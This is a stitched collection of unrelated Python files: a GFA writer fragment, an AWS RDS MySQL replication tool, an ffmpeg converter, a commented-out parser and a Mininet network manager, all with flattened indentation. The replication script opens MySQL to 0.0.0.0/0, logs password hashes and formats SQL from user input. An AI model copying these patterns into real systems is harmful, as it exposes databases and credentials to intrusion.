logging.debug("gfa_site: %d", self.gfa_site)
for var_string in vars:
                if pre_var_id is not None:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (
pre_var_id,
self.gfa_id,
)
var_end_ids = self.build_gfa_string(
prg_string=var_string, pre_var_id=pre_var_id
)
end_ids.extend(var_end_ids)
prg_string = prgs[2]
pre_var_id = None
# finally add the final bit of sequence after variant site
if prg_string != "":
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, prg_string)
else:
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, "*")
for id in end_ids:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (id, self.gfa_id)
end_ids = []
return_id = [self.gfa_id]
self.gfa_id += 1
return return_id
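# Example of the PRG fragments this class consumes (the numeric site-marker
# convention is an assumption drawn from the splitting logic above): in
# "AAA 5 C 6 G 5 TTT", site 5 opens and closes a variant site and 6 separates
# its alternatives, so the encoded haplotypes are AAACTTT and AAAGTTT.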
def write_gfa(outfile, prg_string):
"""
Writes a gfa file from prg string.
"""
with open(outfile, "w") as f:
# initialize gfa_string, id and site, then update string with the prg
gfa_string = "H\tVN:Z:1.0\tbn:Z:--linear --singlearr\n"
gfa_id = 0
gfa_site = 5
gfa_obj = GFA_Output(gfa_string)
gfa_obj.build_gfa_string(prg_string=prg_string)
f.write(gfa_obj.gfa_string)
# ******************/
# Write PRG code */
# *****************/
def write_prg(prg_fname: Path, prg_string: str, options: ArgumentParser):
"""
Writes th prg to `output_file`.
Writes it as a human readable string, and also as an integer vector
"""
seqid = options.seqid or options.prg_name
if options.output_type.prg:
with prg_fname.open("w") as prg:
header = f">{seqid} max_nest={options.max_nesting} min_match={options.min_match_length}"
print(f"{header}\n{prg_string}", file=prg)
if options.output_type.binary:
prg_ints_fpath = prg_fname.with_suffix(".bin")
prg_encoder = PrgEncoder()
prg_ints: PRG_Ints = prg_encoder.encode(prg_string)
with prg_ints_fpath.open("wb") as ostream:
prg_encoder.write(prg_ints, ostream)
|
56515
|
import argparse
import subprocess
import logging
import time
import re
import os
from datetime import datetime
from contextlib import closing, contextmanager
import pymysql
import pymysql.cursors
import boto3
import botocore.exceptions
logger = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true", help="print debug logs")
parser.add_argument("--region", required=True, help="AWS region name")
parser.add_argument(
"--source-instance-id",
required=True,
help="name of the existing instance (This is going to be master when replication is setup.)")
parser.add_argument(
"--new-instance-id", required=True, help="name of the slave instance that is going to be created")
parser.add_argument(
"--master-user-name", required=True, help="master username of instance specified with --source-instance-id")
parser.add_argument(
"--master-user-password",
required=True,
help="master user password of instance specified with --source-instance-id")
parser.add_argument(
"--databases", required=True, help="comma separated database names that need to be copied to slave")
parser.add_argument("--users", help="comma separated user names that need to be copied to slave")
parser.add_argument("--availability-zone", help="set it if you want slave on different availability zone")
parser.add_argument("--db-instance-class", help="set it if you want different instance class on slave")
parser.add_argument("--engine-version", help="set it if you want different engine version on slave")
parser.add_argument("--parameter-group", help="set it if you want different parameter group on slave")
parser.add_argument("--option-group", help="set it if you want different option group on slave")
parser.add_argument(
"--allocated-storage", type=int, help="set it if you want to grow/shrink storage space on slave")
parser.add_argument(
"--iops",
type=int,
help="set it if you want different IOPS on slave (must be valid for given --allocated-storage)")
parser.add_argument(
"--binlog-retention-hours",
type=int,
default=24,
help="Darbe set 'binlog retention hours' on master to allow enough time for copying data between instances."
"Increase if your data is too big so that it cannot be copied in 24 hours.")
args = parser.parse_args()
formatter = logging.Formatter('%(asctime)s %(levelname)-5.5s L%(lineno)-3d %(message)s', datefmt='%H:%M:%S')
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logger.info("checking required programs")
subprocess.check_call(['which', 'mysqldump'])
subprocess.check_call(['which', 'mysql'])
# put root password to environ for not using -p flag with mysql commands below.
os.environ['MYSQL_PWD'] = args.master_user_password
rds = boto3.client('rds', region_name=args.region)
ec2 = boto3.client('ec2', region_name=args.region)
db_instance_available = rds.get_waiter('db_instance_available')
# unique string representing current second like 20160101090500
timestamp = str(datetime.utcnow()).replace('-', '').replace(':', '').replace(' ', '')[:14]
@contextmanager
def connect_db(instance, cursorclass=pymysql.cursors.Cursor):
"""Yields a cursor on a new connection to a database."""
conn = pymysql.connect(
user=args.master_user_name,
password=args.master_user_password,
host=instance['Endpoint']['Address'],
port=instance['Endpoint']['Port'],
autocommit=True,
cursorclass=cursorclass)
with closing(conn):
cursor = conn.cursor()
with closing(cursor):
yield cursor
def wait_db_instance_available(instance_id):
"""Timeout on waiter cannot be changed. We keep continue to wait on timeout error."""
while True:
try:
db_instance_available.wait(DBInstanceIdentifier=instance_id)
except botocore.exceptions.WaiterError:
continue
else:
break
def wait_until_zero_lag(instance):
"""Blocks until replication lag is zero."""
while True:
time.sleep(4)
try:
with connect_db(instance, cursorclass=pymysql.cursors.DictCursor) as cursor:
cursor.execute("SHOW SLAVE STATUS")
slave_status = cursor.fetchone()
except Exception as e:
logger.error(str(e))
else:
seconds_behind_master = slave_status['Seconds_Behind_Master']
logger.info("seconds behind master: %s", seconds_behind_master)
if seconds_behind_master is None:
continue
if seconds_behind_master < 1:
break
logger.info("getting details of source instance")
source_instance = rds.describe_db_instances(DBInstanceIdentifier=args.source_instance_id)['DBInstances'][0]
logger.info("creating replication security group")
vpc_id = source_instance['DBSubnetGroup']['VpcId']
try:
response = ec2.create_security_group(
GroupName="darbe-replication",
VpcId=vpc_id,
Description="created by darbe for replication between instances")
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'InvalidGroup.Duplicate':
raise
logger.info("security group already exists")
security_group_id = ec2.describe_security_groups(Filters=[{
'Name': 'vpc-id',
"Values": [vpc_id]
}, {
'Name': 'group-name',
'Values': ['darbe-replication']
}])['SecurityGroups'][0]['GroupId']
else:
security_group_id = response['GroupId']
logger.info("modifying security group rules: %s", security_group_id)
try:
ec2.authorize_security_group_ingress(
GroupId=security_group_id,
IpPermissions=[{
'IpProtocol': 'tcp',
'FromPort': 3306,
'ToPort': 3306,
'IpRanges': [{
'CidrIp': '0.0.0.0/0'
}]
}])
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'InvalidPermission.Duplicate':
raise
logger.info("security group permission already exists")
security_group_ids = [g['VpcSecurityGroupId'] for g in source_instance['VpcSecurityGroups']]
if security_group_id in security_group_ids:
logger.info("replication security group is already attached to the source instance")
else:
logger.info("adding replication security group to the source instance")
security_group_ids.append(security_group_id)
rds.modify_db_instance(DBInstanceIdentifier=args.source_instance_id, VpcSecurityGroupIds=security_group_ids)
logger.info("waiting for source instance to become available")
time.sleep(60) # instance state does not switch to "modifying" immediately
wait_db_instance_available(args.source_instance_id)
with connect_db(source_instance) as cursor:
cursor.execute("SELECT VERSION()")
version_string = cursor.fetchone()[0]
match = re.match(r'(\d+)\.(\d+)\.(\d+)', version_string)
version = tuple(map(int, match.groups())) # type: ignore
logger.info("source instance mysql version: %s", version)
grants = []
if args.users:
logger.info("getting grants from source instance")
with connect_db(source_instance) as cursor:
if version < (5, 7, 6):
password_column = 'Password'
else:
password_column = 'authentication_string'
users_in = ','.join(map(lambda x: "'%s'" % x, args.users.split(',')))
sql = "SELECT User, Host, %s FROM mysql.user WHERE User in (%s)" % (password_column, users_in)
logger.debug("running sql: %s", sql)
cursor.execute(sql)
for user, host, password in cursor.fetchall():
logger.debug("user: %s, host: %s, password: %s", user, host, password)
full_user = "'{}'@'{}'".format(user, host)
logger.debug("full user: %r", full_user)
if version >= (5, 7, 6):
cursor.execute("SHOW CREATE USER %s" % full_user)
create_user_sql = cursor.fetchall()[0][0]
grants.append(create_user_sql)
cursor.execute("SHOW GRANTS FOR %s" % full_user)
for grant in cursor.fetchall():
grant = str(grant[0])
logger.debug("grant: %s", grant)
if version < (5, 7, 6) and 'IDENTIFIED BY' in grant:
grant = grant.replace("<secret>", "'%s'" % password)
grants.append(grant)
logger.info("setting binlog retention hours on source instance to: %s", args.binlog_retention_hours)
with connect_db(source_instance) as cursor:
sql = "call mysql.rds_set_configuration('binlog retention hours', %i)" % args.binlog_retention_hours
logger.debug("running sql: %s", sql)
cursor.execute(sql)
original_parameter_group = args.parameter_group or source_instance['DBParameterGroups'][0]['DBParameterGroupName']
match = re.match(r'.+-darbe-(\d+)', original_parameter_group)
if match:
new_parameter_group = original_parameter_group.replace(match.groups()[0], timestamp)
else:
new_parameter_group = "%s-darbe-%s" % (original_parameter_group, timestamp)
logger.info("copying parameter group as: %s", new_parameter_group)
rds.copy_db_parameter_group(
SourceDBParameterGroupIdentifier=original_parameter_group,
TargetDBParameterGroupIdentifier=new_parameter_group,
TargetDBParameterGroupDescription="copied from %s then modified" % original_parameter_group)
logger.info("modifying new parameter group")
rds.modify_db_parameter_group(
DBParameterGroupName=new_parameter_group,
# these parameters makes slave sql thread run faster,
# otherwise slave may not catch up with the master for write intensive load.
Parameters=[
{
'ParameterName': 'innodb_flush_log_at_trx_commit',
'ParameterValue': '2',
'ApplyMethod': 'immediate',
},
{
'ParameterName': 'sync_binlog',
'ParameterValue': '0',
'ApplyMethod': 'immediate',
},
])
logger.info("creating new db instance: %s", args.new_instance_id)
new_instance_params = dict(
AllocatedStorage=args.allocated_storage or source_instance['AllocatedStorage'],
AutoMinorVersionUpgrade=source_instance['AutoMinorVersionUpgrade'],
AvailabilityZone=args.availability_zone or source_instance['AvailabilityZone'],
BackupRetentionPeriod=0, # should be disabled for fast import, will be enabled after import
CopyTagsToSnapshot=source_instance['CopyTagsToSnapshot'],
DBInstanceClass=args.db_instance_class or source_instance['DBInstanceClass'],
DBInstanceIdentifier=args.new_instance_id,
DBParameterGroupName=new_parameter_group,
DBSubnetGroupName=source_instance['DBSubnetGroup']['DBSubnetGroupName'],
Engine=source_instance['Engine'],
EngineVersion=args.engine_version or source_instance['EngineVersion'],
LicenseModel=source_instance['LicenseModel'],
MasterUserPassword=args.master_user_password,
MasterUsername=args.master_user_name,
OptionGroupName=args.option_group or source_instance['OptionGroupMemberships'][0]['OptionGroupName'],
MultiAZ=False, # should be disabled for fast import, will be enabled after import
Port=source_instance['Endpoint']['Port'],
PreferredBackupWindow=source_instance['PreferredBackupWindow'],
PreferredMaintenanceWindow=source_instance['PreferredMaintenanceWindow'],
PubliclyAccessible=source_instance['PubliclyAccessible'],
StorageEncrypted=source_instance['StorageEncrypted'],
StorageType=source_instance['StorageType'],
VpcSecurityGroupIds=security_group_ids, )
if source_instance.get('Iops', 0) > 0:
new_instance_params['Iops'] = args.iops or source_instance['Iops']
if source_instance.get('MonitoringInterval', 0) > 0:
new_instance_params['MonitoringInterval'] = source_instance['MonitoringInterval']
new_instance_params['MonitoringRoleArn'] = source_instance['MonitoringRoleArn']
rds.create_db_instance(**new_instance_params)
read_replica_instance_id = "%s-readreplica-%s" % (source_instance['DBInstanceIdentifier'], timestamp)
logger.info("crating read replica: %s", read_replica_instance_id)
rds.create_db_instance_read_replica(
DBInstanceIdentifier=read_replica_instance_id,
SourceDBInstanceIdentifier=source_instance['DBInstanceIdentifier'],
DBInstanceClass=source_instance['DBInstanceClass'],
AvailabilityZone=source_instance['AvailabilityZone'])['DBInstance']
logger.info("waiting for new instance to become available")
wait_db_instance_available(args.new_instance_id)
logger.info("getting details of new instance")
new_instance = rds.describe_db_instances(DBInstanceIdentifier=args.new_instance_id)['DBInstances'][0]
logger.info("waiting for read replica to become available")
wait_db_instance_available(read_replica_instance_id)
logger.info("getting details of created read replica")
read_replica_instance = rds.describe_db_instances(DBInstanceIdentifier=read_replica_instance_id)['DBInstances'][0]
logger.info("stopping replication on read replica")
with connect_db(read_replica_instance, cursorclass=pymysql.cursors.DictCursor) as cursor:
cursor.callproc("mysql.rds_stop_replication")
logger.info("finding binlog position")
cursor.execute("SHOW SLAVE STATUS")
slave_status = cursor.fetchone()
binlog_filename, binlog_position = slave_status['Relay_Master_Log_File'], slave_status['Exec_Master_Log_Pos']
logger.info("master status: filename: %s position: %s", binlog_filename, binlog_position)
logger.info("dumping data from read replica")
dump_args = [
'mysqldump',
'-h',
read_replica_instance['Endpoint']['Address'],
'-P',
str(read_replica_instance['Endpoint']['Port']),
'-u',
args.master_user_name,
'--single-transaction',
'--order-by-primary',
'--set-gtid-purged=OFF',
'--databases',
]
logger.debug("running mysqldump: %s", " ".join(dump_args))
dump_args.extend(args.databases.split(','))
dump = subprocess.Popen(dump_args, stdout=subprocess.PIPE)
logger.info("loading data to new instance")
load_args = [
'mysql',
'-h',
new_instance['Endpoint']['Address'],
'-P',
str(new_instance['Endpoint']['Port']),
'-u',
args.master_user_name,
'-f',
]
logger.debug("running mysql for loding data: %s", " ".join(load_args))
load = subprocess.Popen(load_args, stdin=dump.stdout)
logger.info("waiting for data transfer to finish")
load.wait()
assert load.returncode == 0
dump.wait()
assert dump.returncode == 0
logger.info("data transfer is finished")
logger.info("deleting read replica instance")
rds.delete_db_instance(DBInstanceIdentifier=read_replica_instance_id, SkipFinalSnapshot=True)
logger.info("setting master on new instance")
with connect_db(new_instance) as cursor:
cursor.callproc("mysql.rds_set_external_master",
(source_instance['Endpoint']['Address'], source_instance['Endpoint']['Port'],
args.master_user_name, args.master_user_password, binlog_filename, binlog_position, 0))
logger.info("starting replication on new instance")
with connect_db(new_instance) as cursor:
cursor.callproc("mysql.rds_start_replication")
if grants:
logger.info("creating users on new instance")
with connect_db(new_instance) as cursor:
for grant in grants:
logger.debug("executing grant sql: %s", grant)
cursor.execute(grant)
logger.info("wating until new instance catches source instance")
wait_until_zero_lag(new_instance)
changes = {}
if source_instance['BackupRetentionPeriod'] > 0:
changes['BackupRetentionPeriod'] = source_instance['BackupRetentionPeriod']
changes['PreferredBackupWindow'] = source_instance['PreferredBackupWindow']
if source_instance['MultiAZ']:
changes['MultiAZ'] = source_instance['MultiAZ']
if source_instance['PerformanceInsightsEnabled']:
changes['EnablePerformanceInsights'] = source_instance['PerformanceInsightsEnabled']
changes['PerformanceInsightsKMSKeyId'] = source_instance['PerformanceInsightsKMSKeyId']
changes['PerformanceInsightsRetentionPeriod'] = source_instance['PerformanceInsightsRetentionPeriod']
if changes:
logger.info("modifying new instance last time")
rds.modify_db_instance(DBInstanceIdentifier=args.new_instance_id, ApplyImmediately=True, **changes)
logger.info("waiting for new instance to become available")
time.sleep(60) # instance state does not switch to "modifying" immediately
wait_db_instance_available(args.new_instance_id)
logger.info("wating until new instance catches source instance")
wait_until_zero_lag(new_instance)
logger.info("all done")
if __name__ == '__main__':
main()
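# Example invocation (script name and values are illustrative):
#
#   python darbe.py --region us-east-1 \
#       --source-instance-id mydb \
#       --new-instance-id mydb-replica \
#       --master-user-name admin \
#       --master-user-password secret \
#       --databases app,analytics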
|
56543
|
import os
import subprocess
from audio_length import escape_characters
import argparse
filetypes_to_convert=[".mp3",".m4a", ".webm"]
def convert(filename):
filename_extensionless, extension = os.path.splitext(filename)
new_filename = "".join([filename_extensionless, ".wav"])
if not os.path.exists(new_filename):
command = "ffmpeg -i \"{}\" -ac 1 \"{}\"".format(escape_characters(filename), escape_characters(new_filename))
subprocess.call(command, shell=True)
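# Example of the command this builds (the path is illustrative):
#   ffmpeg -i "song.mp3" -ac 1 "song.wav"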
def walk_path(path):
for root, dirs, files in os.walk(path):
for sound_file in files:
_, extension = os.path.splitext(sound_file)
#print sound_file
if extension in filetypes_to_convert:
yield os.path.join(root, sound_file)
else:
continue
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--path', dest='path', help='Directory for the files to convert', required=True)
args = parser.parse_args()
for sound_file in walk_path(args.path):
convert(sound_file)
|
56597
|
from stream import CStream
from tokenizer import L2
from data import Expr, Literal, Position
#import space
#table = {
# u'(': u'lp', u')': u'rp',
# u'[': u'lb', u']': u'rb',
# u'{': u'lc', u'}': u'rc',
# u'and': u'and', u'or': u'or', u'not': u'not',
# u'=': u'let', u':=': u'set',
# u'<': u'chain',
# u'>': u'chain',
# u'<=': u'chain',
# u'>=': u'chain',
# u'==': u'chain',
# u'!=': u'chain',
# u'^': u'op', u'&': u'op', u'<<': u'op',
# u'>>': u'op', u'!': u'op', u'*': u'op',
# u'/': u'op', u'%': u'op', u'+': u'op',
# u'-': u'op', u'|': u'op', u'++': u'op',
# u':': u'symbol',
# u'.': u'dot'}
#binops = {
# u'|': 10,
# u'^': 10,
# u'&': 20,
# u'<<': 30, u'>>': 40,
# u'++': 40, u'+': 40, u'-': 40,
# u'*': 50, u'/': 50, u'%': 50,
#}
#right_binding = []
#prefixes = {
# u'~': 90,
# u'-': 90,
# u'+': 90,
#}
#postfixes = {
# u'!': 100,
#}
#
#def read(source):
# exps = []
# ts = L2(CStream(source), table)
# while ts.filled:
# if ts.position.col != 0:
# raise space.Error(u"%s: layout error" % ts.first.start.repr())
# exps.append(toplevel(ts, 0))
# return exps
#
#def toplevel(ts, col):
# head = expression(ts)
# if head.dcf is not None and ts.filled:
# if head.stop.lno == ts.position.lno:
# head.dcf.capture = [toplevel(ts, col)]
# elif ts.position.col > col:
# head.dcf.capture = exps = []
# scol = ts.position.col
# while ts.filled and ts.position.col == scol:
# exp = toplevel(ts, scol)
# exps.append(exp)
# while ts.filled and ts.position.lno == exp.stop.lno and ts.position.col > scol:
# exps.append(toplevel(ts, scol))
# return head
#
#def expressions(ts):
# exps = []
# while ts.filled:
# if match_some(ts.first, [u'rp', u'rb', u'rc']):
# break
# exps.append(expression(ts))
# return exps
#
#def expression(ts):
# left = expression_and(ts)
# if match(ts.first, u'or'):
# op = ts.advance()
# op.name = u'symbol'
# right = expression(ts)
# return Expr(left.start, right.stop, u'form', [op, left, right])
# return left
#
#def expression_and(ts):
# left = expression_chain(ts)
# if match(ts.first, u'and'):
# op = ts.advance()
# op.name = u'symbol'
# right = expression_and(ts)
# return Expr(left.start, right.stop, u'form', [op, left, right])
# return left
#
#def expression_chain(ts):
# left = expression_bare(ts, 0)
# if match(ts.first, u'chain'):
# exps = [left]
# while match(ts.first, u'chain'):
# op = ts.advance()
# op.name = u'symbol'
# exps.append(op)
# exps.append(expression_bare(ts, 0))
# left = Expr(exps[0].start, exps[len(exps)-1].stop, u'chain', exps)
# return left
#
#def expression_bare(ts, rbp):
# if on_prefix(ts):
# op = ts.advance()
# exp = expression_bare(ts, prefixes[op.value])
# op.name = u'symbol'
# op.value = op.value+u'expr'
# left = Expr(op.start, exp.stop, u'form', [op, exp])
# else:
# left = terminal(ts)
# while ts.filled:
# if match(ts.first, u'dot'):
# dot = ts.advance()
# symbol = ts.advance()
# if not match(symbol, u'symbol'):
# raise space.Error(u"%s: expected symbol" % symbol.start.repr())
# left = Expr(left.start, symbol.stop, u'attr', [left, symbol])
# elif match(ts.first, u'lb') and left.stop.eq(ts.first.start):
# lb = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rb'):
# raise space.Error(u"%s: [] truncates at %s" % (lb.start.repr(), ts.position.repr()))
# rb = ts.advance()
# left = Expr(left.start, rb.stop, u'index', [left] + exps)
# elif match_some(ts.first, [u'let', u'set']):
# let = ts.advance()
# exp = expression(ts)
# left = Expr(left.start, exp.stop, let.name, [left, exp])
# elif match(ts.first, u'op') and match(ts.second, u'let') and ts.first.value in binops:
# aug = ts.advance()
# aug.name = u'symbol'
# let = ts.advance()
# exp = expression(ts)
# left = Expr(left.start, exp.stop, u'aug', [aug, left, exp])
# else:
# break
# while ts.filled:
# if on_binop(left, ts) and rbp < binops.get(ts.first.value, 0):
# op = ts.advance()
# op.name = u'symbol'
# lbp = binops.get(op.value, 0)
# right = expression_bare(ts, lbp - (ts.first.value in right_binding))
# left = Expr(left.start, right.stop, u'form', [op, left, right])
# elif on_postfix(left, ts) and rbp < postfixes.get(ts.first.value, 0):
# op = ts.advance()
# op.name = u'symbol'
# lbp = postfixes.get(op.value, 0)
# op.value = u'expr'+op.value
# left = Expr(left.start, op.stop, u'form', [op, left])
# else:
# break
# return left
#
#def terminal(ts):
# if match_some(ts.first, [u'symbol', u'string', u'int', u'hex', u'float']):
# return ts.advance()
# elif match(ts.first, u'lp'):
# lp = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rp'):
# raise space.Error(u"%s: form truncates at %s" % (lp.start.repr(), ts.position.repr()))
# rp = ts.advance()
# exp = Expr(lp.start, rp.stop, u'form', exps)
# exp.dcf = exp
# return exp
# elif match(ts.first, u'lb'):
# lb = ts.advance()
# exps = expressions(ts)
# if not match(ts.first, u'rb'):
# raise space.Error(u"%s: list truncates at %s" % (lb.start.repr(), ts.position.repr()))
# rb = ts.advance()
# exp = Expr(lb.start, rb.stop, u'list', exps)
# exp.dcf = exp
# return exp
# elif match(ts.first, u'lc'):
# lc = ts.advance()
# if match(ts.second, u'rc'):
# exp = ts.advance()
# exp.name = u'symbol'
# else:
# exp = expression(ts)
# rc = ts.advance()
# return exp
# elif match(ts.first, u'not'):
# op = ts.advance()
# op.name = u'symbol'
# exp = expression_chain(ts)
# return Expr(op.start, exp.stop, u'form', [op, exp])
# if ts.filled:
# raise space.Error(u"%s: expected term, got %s" % (ts.position.repr(), ts.first.value))
# raise space.Error(u"%s: expected term, got eof" % ts.position.repr())
#
#def match_some(t, names):
# return t is not None and t.name in names
#
#def match(t, name):
# return t is not None and t.name == name
#
#def on_prefix(ts):
# if match(ts.first, u'op') and ts.second is not None:
# return ts.first.stop.eq(ts.second.start)
# return False
#
#def on_binop(left, ts):
# if match(ts.first, u'op') and ts.second is not None:
# l = left.stop.eq(ts.first.start)
# r = ts.first.stop.eq(ts.second.start)
# return l == r
# return False
#
#def on_postfix(left, ts):
# if match(ts.first, u'op'):
# l = left.stop.eq(ts.first.start)
# r = ts.second is not None and ts.first.stop.eq(ts.second.start)
# return l and not r
# return False
|
56647
|
import os
import sys
from mininet.node import RemoteController
from mininet.net import Mininet
import dc_gym.utils as dc_utils
import logging
log = logging.getLogger(__name__)
cwd = os.getcwd()
FILE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, FILE_DIR)
def get_congestion_control():
prev_cc = os.popen("sysctl -n net.ipv4.tcp_congestion_control").read()
return prev_cc
def load_congestion_control(tcp_policy):
if tcp_policy == "dctcp":
dc_utils.exec_process("modprobe tcp_dctcp")
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
elif tcp_policy == "tcp_nv":
dc_utils.exec_process("modprobe tcp_nv")
elif tcp_policy == "pcc":
if (os.popen("lsmod | grep pcc").read() == ""):
dc_utils.exec_process("insmod %s/tcp_pcc.ko" % FILE_DIR)
def calc_ecn(max_throughput, avg_pkt_size):
# Calculate the marking threshold as part of the BDP
bdp = max_throughput * 100 * 1e-6
marking_threshold = bdp * 0.17
# if the marking_threshold is smaller than the packet size set the
# threshold to around two packets
if (marking_threshold < avg_pkt_size):
marking_threshold = avg_pkt_size * 2
# also limit the marking threshold to 50KB
elif marking_threshold > 50e3:
marking_threshold = 50e3
return marking_threshold
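# Worked example (assuming max_throughput is in bit/s and the 100 * 1e-6 factor
# is an implicit 100 us base delay): for a 10 Mbit/s link, bdp = 10e6 * 1e-4 = 1000
# and 0.17 * bdp = 170, which is below a 1500-byte packet, so the threshold is
# bumped to 2 * 1500 = 3000.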
class NetworkManager():
def __init__(self, topo, tcp_policy="tcp"):
self.topo = topo
self.net = None
self.net_stopped = False
self.host_ctrl_map = {}
self.tcp_policy = tcp_policy
self.prev_cc = get_congestion_control()
load_congestion_control(tcp_policy)
self.start_network()
def _apply_qdisc(self, port):
""" Here be dragons... """
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "root handle 1: hfsc default 10"
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc class add dev %s " % (port)
# cmd = "parent 1: classid 1:10 hfsc sc rate %dbit ul rate %dbit" % (
# self.topo.max_bps, self.topo.max_bps)
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
limit = int(self.topo.max_queue)
avg_pkt_size = 1500 # MTU packet size
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "root handle 1: htb default 10 "
# cmd = "root handle 1: estimator 250msec 1sec htb default 10 "
cmd += " direct_qlen %d " % (limit / avg_pkt_size)
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
tc_cmd = "tc class add dev %s " % (port)
cmd = "parent 1: classid 1:10 htb rate %dbit burst %d" % (
self.topo.max_bps, self.topo.max_bps)
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
if self.tcp_policy == "dctcp":
marking_threshold = calc_ecn(self.topo.max_bps, avg_pkt_size)
# Apply aggressive RED to mark excess packets in the queue
max_q = limit / 4
min_q = int(marking_threshold)
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "parent 1:10 handle 20:1 red "
cmd += "limit %d " % (limit)
cmd += "bandwidth %dbit " % self.topo.max_bps
cmd += "avpkt %d " % avg_pkt_size
cmd += "min %d " % min_q
cmd += "max %d " % max_q
# Ballpark burst hard limit...
burst = (min_q + min_q + max_q) / (3 * avg_pkt_size)
cmd += "burst %d " % burst
cmd += "probability 0.1"
cmd += " ecn "
log.debug(tc_cmd + cmd)
dc_utils.exec_process(tc_cmd + cmd)
else:
tc_cmd = "tc qdisc add dev %s " % (port)
cmd = "parent 1:10 handle 20:1 bfifo "
cmd += " limit %d" % limit
dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "root handle 1 netem limit %d rate 10mbit" % (
# limit / avg_pkt_size)
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# limit = int(self.topo.max_queue)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 20: codel "
# cmd += " limit %d" % (limit)
# dc_utils.exec_process(tc_cmd + cmd)
# limit = int(self.topo.max_queue)
# max_q = self.topo.max_queue / 4
# min_q = max_q / 3
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 20:1 sfq limit %d" % (
# self.topo.max_queue)
# if self.dctcp:
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
# cmd += "ecn "
# # cmd += "redflowlimit "
# # cmd += "min %d " % (min_q)
# # cmd += "max %d " % (max_q)
# # cmd += "probability 1"
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# Apply tc choke to mark excess packets in the queue with ecn
# limit = int(self.topo.max_queue)
# max_q = self.topo.max_queue
# min_q = 400
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 10:1 choke limit %d " % limit
# cmd += "bandwidth %dbit " % self.topo.max_bps
# cmd += "min %d " % (min_q)
# cmd += "max %d " % (max_q)
# cmd += "probability 0.001"
# # if self.dctcp:
# cmd += " ecn "
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
# tc_cmd = "tc qdisc add dev %s " % (port)
# cmd = "parent 1:10 handle 30:1 fq_codel limit %d " % (
# self.topo.max_queue)
# if ("dctcp" in self.conf) and self.conf["dctcp"]:
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1")
# cmd += "ecn "
# log.info(tc_cmd + cmd)
# dc_utils.exec_process(tc_cmd + cmd)
dc_utils.exec_process("ip link set %s txqueuelen %d" %
(port, limit / avg_pkt_size))
dc_utils.exec_process("ip link set %s mtu 1500" % port)
def _connect_controller(self, net):
controller = RemoteController(self.topo.switch_id + "_c")
net.addController(controller)
for i, host in enumerate(self.topo.host_list):
# Configure host
net.addLink(controller, host)
# Configure controller
ctrl_iface = "%s_c-eth%d" % (self.topo.switch_id, i)
for index, switch in self.topo.ports[host].items():
switch_iface = switch[0] + "-eth" + str(switch[1])
self.host_ctrl_map[switch_iface] = ctrl_iface
def _config_links(self, net):
for switch in net.switches:
for port in switch.intfList():
if port.name != "lo":
self._apply_qdisc(port)
def _config_hosts(self, net):
for host in net.hosts:
            # Tune TCP options on every host: enable window scaling,
            # timestamps and SACK, and raise the number of SYN retries.
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_window_scaling=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_timestamps=1", host)
dc_utils.exec_process("sysctl -w net.ipv4.tcp_sack=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_syn_retries=10", host)
# dc_utils.exec_process(
# "sysctl -w net.core.default_qdisc=pfifo_fast", host)
# dc_utils.exec_process("sysctl -w net.ipv4.tcp_recovery=0")
if self.tcp_policy == "dctcp":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=dctcp", host)
dc_utils.exec_process("sysctl -w net.ipv4.tcp_ecn=1", host)
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_ecn_fallback=0", host)
elif self.tcp_policy == "tcp_nv":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=nv", host)
elif self.tcp_policy == "pcc":
dc_utils.exec_process(
"sysctl -w net.ipv4.tcp_congestion_control=pcc", host)
def _config_network(self, net):
self.topo._config_topo()
self._config_links(net)
self._config_hosts(net)
self._connect_controller(net)
# log.info("Testing reachability after configuration...\n")
# net.ping()
# log.info("Testing bandwidth after configuration...\n")
# net.iperf()
def get_net(self):
return self.net
def get_topo(self):
return self.topo
def get_sw_ports(self):
switches = self.net.switches
sw_intfs = []
for switch in switches:
for intf in switch.intfNames():
                if intf != "lo":
sw_intfs.append(intf)
return sw_intfs
def get_host_ports(self):
return self.host_ctrl_map.keys()
def get_num_sw_ports(self):
